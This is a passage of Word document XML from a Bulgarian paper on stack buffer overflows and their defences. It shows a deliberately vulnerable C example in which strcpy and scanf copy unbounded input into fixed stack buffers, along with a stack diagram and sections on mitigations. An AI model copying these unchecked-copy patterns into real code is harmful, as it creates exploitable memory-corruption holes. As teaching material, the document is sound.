        <w:t>) е записване на информация след края на предварително заделен масив, още наричан буфер. Това най-често се случва при копиране на символни низове, но се наблюдава и на други места. Принципът на работа е, че при писане на дълги масиви от данни, заделени в тялото на кадъра на една функция, при лоши проверки за дължината на информацията може да бъдат презаписани запазените rbp и rip за предния кадър. При приключване на изпълнението адресът за връщане ще е или грешен, или злонамерено подправен. Програмата overflow_example.c демонстрира проблема:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:lastRenderedPageBreak/>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:t>void process(char *param) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>char buf[25];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>strcpy(buf, param);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>printf("%s", buf);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>char global_buf[100];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>scanf("%s", &amp;global_buf);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>process(global_buf);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:tab/>
        <w:t>printf("all normal");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC3933">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>overflow_example.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00EA3DCB">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">В нея има масив (global_buf), в който се приема вход, който се дава на функцията </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>process()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> за примерна обработка. Тя го копира в свой масив и го изкарва на стандартен изход.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00EA3DCB">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">При кратък вход програмата се държи нормално, но при по-дълъг тя бива прекратена със съобщение </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DC3933">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>*** stack smashing detected ***: &lt;unknown&gt; terminated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DC3933">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">30022 abort  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>./a.out</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">В случая защитата от тип </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:t xml:space="preserve">канарче (описана в т. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:instrText xml:space="preserve"> REF _Ref2190146 \r \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:t>1.3.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EA3DCB">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>се активира, предупреждава за ситуацията и прекратява програмата преди да може да се случи нещо неочаквано. Ако се вгледаме се забелязват два проблема с кода:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Входът се чете със </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>scanf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и се копира с функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>strcpy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. И двете нямат проверки за размер и разчитат на потребителя, че ще въведе вярна информация. При кратък вход (по-малък от 25 символа) няма никакви проблеми. Между 25 и 100 символа buf прелива, защото функцията </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> копира докато срещне нулев байт и не проверява за размер. Същото се случва и със </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>scanf</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> при вход над 100 символа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_17kx2emcmkdd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>before buffer overflow            after buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+                   +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rip   | buffer[30]        |     xxxx      | buffer[30]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+&lt;------            +---------------+&lt;------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   saved rbp   |                   |     xxxx      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+                   +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|  buffer[24]   |                   |  buffer[24]   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+                   +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       .       |                   |       .       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       .       |                   |       .       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|       .       |                   |       .       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+                   +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>|   buffer[0]   |                   |   buffer[0]   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
      </w:pPr>
      <w:r>
        <w:t>+---------------+                   +---------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARAB</w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve">IC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>Преди и след препълване на буфер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc3540751"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Защити</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Про</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>блемът е много разпространен и се наблюдава вече няколко десетилетия. С годините са разработени много методи за борба с него. Те са изключително разнообразни и могат да бъдат намерени на всички нива на абстракция и етапи на разработка. Основно се делят на 2 типа: защити на самата програма и механизми на операционната система.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_brd16i46gc3o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="20" w:name="_Toc3540752"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Static</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Инструментите за статичен </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>анализ, като “Clang Static Analyzer”</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:endnoteReference w:id="11"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>, се опитват да намерят проблеми със сорс кода и да предупредят за потенциални бъгове. Те хващат повечето пропуски, например разминаване между проверка и размер на буфер и итерация извън граници (out of bounds). Те обаче се затрудняват при по-сложни конструкции, например clang static analyzer не открива проблеми в overflow_example.c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> В комбинация с профилиращи инструменти, като valgrind</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="12"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, могат да се избегнат много от проблемите с управлението на паметта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_n3kg5u258iug" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="22" w:name="_Toc3540753"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Сигурни функции (bounds checking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Има функции, които се разглеждат като несигурни и тяхното използване изобщо не се препоръчва. Тяхната употреба се счита за опасна и замяната им със </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>сигурни алтернативи е силно препоръчителна. Класически пример е функцията gets(), чиито опасности са описани в секцията “BUGS” на man страницата</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Never  use  gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to  store  characters  past the  end  of the buffer, it is extremely dangerous to use.  It has been used to break computer security.  Use fgets() instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">For  more  information,  see  CWE-242  (aka  "Use  of  Inherently  Dangerous   Function") at </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidRPr="00112660">
          <w:t>http://cwe.mitre.org/data/definitions/242.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Макар че </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>scanf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>strcpy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> не са считат за такива, има много предупреждения за рискове при използването им.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Използването на еквиваленти функции с проверки за размер би могло да предотврати buffer overflow проблеми.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_22u7h7esw0b2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="24" w:name="_Toc3540754"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Употреба</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> на езици от по-високо ниво (automatic bounds checking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Всички скриптови езици</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="13"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и java имат среда за изпълнение, която проверява дали всеки достъп до памет е в границите си. По този начин,  стига средата да прави адекватни </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>проверки</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>, проблемът се избягва напълно. Единственият недостатък е забавеното изпълнение, с което се борят езици като rust, които се опитват да дефинират механизми на езика, които предотвратяват проблеми с паметта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Подходът, естествено, подлежи на критика:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Забавено изпълнение - не е незначително, но в общия случай е пренебрежимо. Основното забавяне в проекти като уеб сървъри е чакане за входно-изходни операции и малко забавяне от средата е незначително. Проекти, като бази данни, където производителността е критична, не могат да си позволят такъв компромис.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Замяната на индивидуално уязвими програми с рядко обновявани среди на изпълнение или интерпретатори, които могат да имат свои проблеми. Въпреки че средата предотвратява почти всички buffer overflow уязвимости, много потребители не я обновяват по най-различни причини. Така открити проблеми застрашават голям набор от проекти и могат да останат в производство с години. Като пример за това може да се посочи </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">наскоро открит бъг в </w:t>
      </w:r>
      <w:r w:rsidRPr="00543FBF">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>os.symlink()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> в python под Windows, както и много други, изброени в “Python Security Documentation”</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="14"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00DC3933" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
